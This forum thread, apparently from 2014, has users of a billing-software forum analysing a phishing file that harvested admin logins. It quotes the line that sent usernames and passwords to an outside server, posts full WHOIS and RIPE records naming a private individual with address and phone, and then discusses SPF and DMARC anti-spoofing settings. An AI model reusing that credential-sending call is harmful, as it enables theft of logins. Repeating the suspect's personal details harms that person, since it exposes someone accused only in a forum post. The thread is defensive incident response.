Michael Posted September 25, 2014 Author Report Posted September 25, 2014 Please E-Mail I will decode and send in 10 min. It's been decoded mate. PauloV 1
Paul Posted September 25, 2014 Report Posted September 25, 2014 Yeah, PauloV decoded it. I debated not posting this information but here's where the file sends your admin details: https://my.dorob.de/modules/addons/passwords/insert.php?url=" . $url . "&user=" . $u . "&pw=" . $p Domain is registered to: Domain: dorob.deNserver: ns1.dorob.de 213.9.14.107Nserver: ns2.dorob.de 217.79.214.245Nserver: ns3.dorob.de 89.202.121.167Status: connectChanged: 2014-06-29T15:52:08+02:00 [Tech-C]Type: PERSONName: Eric KlemmeOrganisation: EK-WebservicesAddress: Eckernfoerder Strasse 73PostalCode: 24116City: KielCountryCode: DEPhone: +49 431498760Fax: +49 431498760Email: webmaster@dorob.deChanged: 2014-06-18T19:21:09+02:00 [Zone-C]Type: PERSONName: Eric KlemmeOrganisation: EK-WebservicesAddress: Eckernfoerder Strasse 73PostalCode: 24116City: KielCountryCode: DEPhone: +49 431498760Fax: +49 431498760Email: webmaster@dorob.deChanged: 2014-06-18T19:21:09+02:00 IP address is 37.228.135.135 which belongs to: [Querying whois.ripe.net][whois.ripe.net]% This is the RIPE Database query service.% The objects are in RPSL format.%% The RIPE Database is subject to Terms and Conditions.% See http://www.ripe.net/db/support/db-terms-conditions.pdf % Note: this output has been filtered.% To receive output for a database update, use the "-B" flag. % Information related to '37.228.128.0 - 37.228.151.255' % Abuse contact for '37.228.128.0 - 37.228.151.255' is 'abuse@weesly.de' inetnum: 37.228.128.0 - 37.228.151.255netname: DE-WEESLY-20120410descr: Thomas Schoebel trading as Weeslycountry: DEorg: ORG-TSta3-RIPEadmin-c: TS7212-RIPEtech-c: TS7212-RIPEstatus: ALLOCATED PAmnt-by: RIPE-NCC-HM-MNTmnt-lower: MNT-WEESLYmnt-routes: MNT-WEESLYsource: RIPE # Filtered organisation: ORG-TSta3-RIPEorg-name: Thomas Schoebel trading as Weeslyorg-type: LIRaddress: Thomas Moehring trading as Weeslyaddress: Ahrensburger Stieg 19address: 22359address: Hamburgaddress: GERMANYphone: +4940228171220fax-no: +4940228171229mnt-ref: RIPE-NCC-HM-MNTmnt-ref: MNT-WEESLYmnt-by: RIPE-NCC-HM-MNTabuse-c: AW4405-RIPEsource: RIPE # Filtered person: Thomas Schoebeladdress: Ahrensburger Stieg 19address: 22359 Hamburgphone: +49.40228171220fax-no: +49.40228171229abuse-mailbox: abuse@weesly.deremarks: *******************************************remarks: * SPAM / ABUSE / SECURITY / OTHERS *remarks: *******************************************remarks: * For spam/abuse/security issues please *remarks: * contact us directly: Abuse@weesly.de *remarks: *******************************************remarks: * Complete Contact information you'll *remarks: * get on our website: www.weesly.de *remarks: *******************************************remarks: * For other information or issues please *remarks: * sent to Hostmaster@weesly.de *remarks: *******************************************nic-hdl: TS7212-RIPEmnt-by: MNT-WEESLYsource: RIPE # Filtered % Information related to '37.228.128.0/20AS198599' route: 37.228.128.0/20descr: IP Routing via Weesly.deorigin: AS198599mnt-by: MNT-WEESLYsource: RIPE # Filtered % This query was served by the RIPE Database Query Service version 1.75 (DB-4) This person also has the twitter account https://twitter.com/dorobde and was critical of Blesta in this tweet: https://twitter.com/DoRobDE/status/507934296829861888 @billingbrawl I find blesta really cool and would have bought it - but it is really uncool, that you make bad advertisement for competition. gutterboy, domaingood, PauloV and 2 others 5
adrzei Posted September 25, 2014 Report Posted September 25, 2014 Thanks for decoding! Could someone send me the decrypted file?At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company. We will pass the information to the German police. PauloV, flangefrog, Michael and 1 other 4
Michael Posted September 25, 2014 Author Report Posted September 25, 2014 Thanks for decoding! Could someone send me the decrypted file? At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company. We will pass the information to the German police. Glad you didn't fool for it PauloV 1
wfitg Posted September 25, 2014 Report Posted September 25, 2014 Here is a good write up on setting DNS SPF record to prevent your domain name from being spoofed; It also stops spoofed email from coming to your box if the "hard fail" element is used. https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability Most cPanels create SFP with the hard fail. "v=spf1 -all" But it is better to use the the soft fail. This way you get the spoofed email, but it is tagged as suspicious: "v=spf1 ~all"
Michael Posted September 25, 2014 Author Report Posted September 25, 2014 Here is a good write up on setting DNS SPF record to prevent your domain name from being spoofed; It also stops spoofed email from coming to your box if the "hard fail" element is used. https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability Most cPanels create SFP with the hard fail. "v=spf1 -all" But it is better to use the the soft fail. This way you get the spoofed email, but it is tagged as suspicious: "v=spf1 ~all" Yeah I think however that only works for fake @domain.com not domain.com@gmail.com we have: DMARC which again like SPF works at ensuring the IP is correct of the sender. v=DMARC1; p=quarantine; pct=50; adkim=strict; but it quarantines fakes, but only 50% of it (This is to ensure real emails don't get effected whilst the inboxes are learning). wfitg 1
wfitg Posted September 25, 2014 Report Posted September 25, 2014 Yeah I think however that only works for fake @domain.com not domain.com@gmail.com Correct. Nothing can stop someone from using domain.com@gmail.com --except for being observant. I know it does work if someone is trying to spoof the actual domain name. For example, the mail server would bounce an email from sales@blesta.com if: (1)the blesta zone file has an SPF record set and (2)the email is not originating from blesta's email server. Of course, nothing in life is 100% but I can say that using this has cut down on my domain being spoofed and on the amount of spoofed emails that I receive. If I had a complany like Blesta I would probaby use the "soft fail" [ "v=spf1 ~all" ] flag so I could still get the email but also be alerted that it may not be coming from the correct server. The hard fail option is good for invividuals who do not want to get any spoofed mail at all. Michael 1
Michael Posted September 25, 2014 Author Report Posted September 25, 2014 Correct. Nothing can stop someone from using domain.com@gmail.com --except for being observant. I know it does work if someone is trying to spoof the actual domain name. For example, the mail server would bounce an email from sales@blesta.com if: (1)the blesta zone file has an SPF record set and (2)the email is not originating from blesta's email server. Of course, nothing in life is 100% but I can say that using this has cut down on my domain being spoofed and on the amount of spoofed emails that I receive. If I had a complany like Blesta I would probaby use the "soft fail" [ "v=spf1 ~all" ] flag so I could still get the email but also be alerted that it may not be coming from the correct server. The hard fail option is good for invividuals who do not want to get any spoofed mail at all. DMARC is good for this you get a copy which failed sent to you.
wfitg Posted September 25, 2014 Report Posted September 25, 2014 Yeah I think however that only works for fake @domain.com not domain.com@gmail.com we have: DMARC which again like SPF works at ensuring the IP is correct of the sender. v=DMARC1; p=quarantine; pct=50; adkim=strict; but it quarantines fakes, but only 50% of it (This is to ensure real emails don't get effected whilst the inboxes are learning). This looks great. I may start using DMARK too. However, if the person is on a shared server, but they have a dedicated IP for an SSL this could cause a problem. Their mail is comes from the shared servers's IP address, notfrom their dedicated IP. They will have to add an A record with the shared mail server's IP. Not many users know how to add DNS records so their mail will be bounced.
wfitg Posted September 25, 2014 Report Posted September 25, 2014 DMARC is good for this you get a copy which failed sent to you. This makes it a great solution.
Michael Posted September 25, 2014 Author Report Posted September 25, 2014 This looks great. I may start using DMARK too. However, if the person is on a shared server, but they have a dedicated IP for an SSL this could cause a problem. Their mail is comming from the shared servers's IP address, notfrom their dedicated IP. They will have to add an A record with the shared mail server's IP. Not many users know how to add DNS records so their mail will be bounced. It's per domain so every user can have their own one. If they use it and use a dedicated IP they can set a SPF record to accept emails from both eg: v=spf1 a mx ptr ip4:216.220.167.249 mx:mail.licensecart.com ip4:216.220.167.248 -all thats ours.
wfitg Posted September 25, 2014 Report Posted September 25, 2014 It's per domain so every user can have their own one. If they use it and use a dedicated IP they can set a SPF record to accept emails from both eg: v=spf1 a mx ptr ip4:216.220.167.249 mx:mail.licensecart.com ip4:216.220.167.248 -all thats ours. The -all will reject everything that does not pass. I like to use ~all because I can still get the flagged email. I simply setup a rule to have those flagged emails go to thje flagged folder. Then I can scan through them for any mistaken failures (or someone who simply does not have the records set correctly) and also remember those that are frequent abusers. The frequent ones can be can be blocked on ACL or IP Tables. I guess whatever works is the answer as long as something is in place to prevent domain spoofing. This will stop many of the script kiddies and wannabe hackers, but a determined spammer will try other methods than spoofing to hijack an email server. Michael 1
Michael Posted September 25, 2014 Author Report Posted September 25, 2014 The -all will reject everything that does not pass. I like to use ~all because I can still get the flagged email. I simply setup a rule to have those flagged emails go to thje flagged folder. Then I can scan through them for any mistaken failures (or someone who simply does not have the records set correctly) and also remember those that are frequent abusers. The frequent ones can be can be blocked on ACL or IP Tables. I guess whatever works is the answer as long as something is in place to prevent domain spoofing. This will stop many of the script kiddies and wannabe hackers, but a determined spammer will try other methods than spoofing to hijack an email server. The thing is this wannabe hacker forgot if someone decoded it he's domain would be there, which then linked to the stupid tweet we know about and then linked to a visible who.is, and a team page which we could google their name... wfitg and flangefrog 2
wfitg Posted September 25, 2014 Report Posted September 25, 2014 The thing is this wannabe hacker forgot if someone decoded it he's domain would be there, which then linked to the stupid tweet we know about and then linked to a visible who.is, and a team page which we could google their name... Yeah, he is busted. What an idiot. We have too many experienced webmasters, coders, and admins here for a scrpit kiddie to get away with much. An experienced spammer/hacker would not bother with such nonsense as this. They just want to send their spam. It looks like a deliberate attempt to make the Blesta company look bad. --------------------- here is an SPF generator if anyone needs it http://www.spfwizard.net/ Microsoft makes one too: http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/ Michael 1
adrzei Posted September 25, 2014 Report Posted September 25, 2014 Hi, I just get the message back that server and ip were locked. wfitg and Michael 2
Michael Posted September 25, 2014 Author Report Posted September 25, 2014 Hi, I just get the message back that server and ip were locked. Looks promising, can't load the site. PauloV and adrzei 2
Paul Posted September 25, 2014 Report Posted September 25, 2014 Hi, I just get the message back that server and ip were locked. We sent a notice to the ISP PauloV, gutterboy, domaingood and 1 other 4
silvatech Posted September 25, 2014 Report Posted September 25, 2014 Thanks for decoding! Could someone send me the decrypted file? At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company. We will pass the information to the German police. I have a feeling you may have been targeted as well if noone else has gotten this email. Please let me know what happens after you contact the police and that I am currios.
Paul Posted September 25, 2014 Report Posted September 25, 2014 Thanks for decoding! Could someone send me the decrypted file? At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company. We will pass the information to the German police. Anyone send you the decoded file? The ISP is telling me they are aware of the police investigation. I'm curious how it turns out, and wish you the best of luck. PauloV, Michael and flangefrog 3
Blesta Addons Posted September 25, 2014 Report Posted September 25, 2014 the website is still online !!! if any new update please share .
adrzei Posted September 26, 2014 Report Posted September 26, 2014 I was now yesterday at the police. The processing can take a while now.At the moment I lack the decrypted file.
Michael Posted September 26, 2014 Author Report Posted September 26, 2014 I was now yesterday at the police. The processing can take a while now. At the moment I lack the decrypted file. Paul can help you with that. PauloV 1
cmsbased Posted September 27, 2014 Report Posted September 27, 2014 The site https://dorob.de/whmcs/%C2'> also reselling stolen templates along with extra hooks.php file. I can share the hooks file if it helps the investigation. Michael 1
Recommended Posts